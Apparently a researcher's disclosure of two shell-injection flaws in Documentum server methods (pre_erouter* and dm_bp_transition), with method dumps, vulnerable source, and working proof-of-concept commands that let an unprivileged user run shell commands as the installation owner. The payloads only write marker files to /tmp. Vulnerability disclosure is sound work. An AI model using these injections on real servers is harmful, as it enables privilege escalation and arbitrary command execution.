documentum security vulnerabilities: pre_erouter* methods

As other vulnerable methods (dm_event_sender, replicate_setup_methods) pre_erouter* methods do not check input parameters and can be used to execute any shell command:

API> retrieve,c,dm_method where object_name like 'pre_erouter%'
...
1001ffd78000046c
API> dump,c,l
...
USER ATTRIBUTES

  object_name                     : pre_erouter1_queue
  owner_name                      : dmadmin
  owner_permit                    : 7
  group_name                      : docu
  group_permit                    : 5
  world_permit                    : 3
  method_verb                     : dmawk
  launch_direct                   : F
  launch_async                    : F
  trace_launch                    : T
  run_as_server                   : T
  use_method_content              : T
  method_type                     : dmawk
  use_method_server               : F
  is_restartable                  : F
#  Echo_attr()
  cmdstr = "dmbasic -f " dm_home"/bin/dm_rendPDF_preq.ebs" \
        " -e preq -- " \
        " -docbase " docbase_name \
        " -user " user_name \
        " -router " routerid \
        " -package " packageid \
        " -task " task \
        " -source " source \
        " -ticket " ticket
  ret = system(cmdstr)
  exit (ret)

example of exploitation:

 ~]$ cat  /tmp/test
cat: /tmp/test: No such file or directory
 ~]$ idql repo -Uusername -Ppassword >/dev/null <<_EOF_
> execute do_method with method='pre_erouter4_forward',
> arguments='-docbase ";echo awk_methods_have_vulnerability > /tmp/test;"'
> go
> _EOF_

 ~]$ cat  /tmp/test
awk_methods_have_vulnerability
 ~]$

This vulnerability was reported as CS-44409 (Security vulnerability with pre_erouter methods – shell injection)

documentum security vulnerabilities: dm_bp_transition method

Documentum has two implementations of lifecycle transitions:

  • dmbasic
  • java

The first one is implemented by dm_bp_transition method:

API> retrieve,c,dm_method where object_name='dm_bp_transition'
...
1001ffd780000176
API> dump,c,l
...
USER ATTRIBUTES

  object_name                     : dm_bp_transition
  owner_name                      : dmadmin
  owner_permit                    : 7
  group_name                      : docu
  group_permit                    : 5
  world_permit                    : 3
  method_verb                     : ./dmbasic -f./dm_bp_transition.ebs -eBP_Transition
  method_args                   []: <none>
  launch_direct                   : T
  launch_async                    : F
  trace_launch                    : F
  run_as_server                   : T

this method accepts following parameters:

Sub BP_Transition(_
    docbase_name$,_
    server_config_name$,_
    user_name$,_
    user_ticket$,_
    sysID$,_
    policyID$,_
    aliasID$,_
    userEntryID$,_
    actionID$,_
    userActionID$,_
    userPostprocID$,_
    targetState$,_
    targetStateNo$,_
    resumeStateNo$,_
    run_entry$,_
    run_actions$,_
    commitFlag$,_
    attachFlag$,_
    login_as$,_
    orig_sessionID$)

the most interesting parameters are: user_name$ which is used to construct repository session:

  buff = "connect," & docbase_name & "." & server_config_name _
         & "," & user_name & "," & user_ticket
  sess = dmAPIGet(buff)

  If sess = "" Then
    dmExit(CONNECTION_ERROR)
  End If

and userPostprocID$ which is used to run custom dmbasic procedure:

  If (result = True And commitFlag = "T") Then
    If (debug = True) Then
      PrintToLog sess, "Commit the changes."
    End If
    result = CommitIt(sess, sysID, policyID, aliasID, targetStateNo, resumeStateNo, attachFlag)
    If (result = True) Then
      If (debug = True) Then
        PrintToLog sess, "Run post action."
      End If
      result = RunProcedure(userPostprocID, 4, sess, sysID,_
                            user_name, targetState)
    End If
  Else

Such implementation allows any user to write own dmbasic procedure and run it with installation owner privileges, example:

$ cat /tmp/test  
cat: /tmp/test: No such file or directory  
$ cat > test.ebs  
Public Function EntryCriteria(ByVal SessionId As String, 
                              ByVal ObjectId As String, 
                              ByVal UserName As String, 
                              ByVal TargetState As String, 
                              ByRef ErrorString As String
                ) As Boolean  
  t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")  
  EntryCriteria=True  
End Function  
$ iapi  
Please enter a docbase name (docubase): repo  
Please enter a user (dmadmin): unprivileged_user  
Please enter password for unprivileged_user:  
  
  
        EMC Documentum iapi - Interactive API interface  
        (c) Copyright EMC Corp., 1992 - 2011  
        All rights reserved.  
        Client Library Release 6.7.1000.0027  
  
  
Connecting to Server using docbase repo  
[DM_SESSION_I_SESSION_START]info:  "Session 0101d920800b1a37 
       started for user unprivileged_user."  
  
  
Connected to Documentum Server running Release 6.7.1090.0170  Linux.Oracle  
Session id is s0  
API> create,c,dm_procedure  
...  
0801d920804e5416  
API> set,c,l,object_name  
SET> test  
...  
OK  
API> setfile,c,l,test.ebs,crtext  
...  
OK  
API> save,c,l  
...  
OK  
API> ?,c,execute do_method with method='dm_bp_transition', 
         arguments='repo repo dmadmin "" 0000000000000000 0000000000000000 
                    0000000000000000 0801d920804e5416 0000000000000000 0000000000000000 
                    0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000
         '  
(1 row affected)  
  
API> Bye  
$ cat /tmp/test  
dm_bp_transition_has_vulnerability

This vulnerability was reported as CS-44439 (Security vulnerability with dm_bp_transition.ebs – shell injection)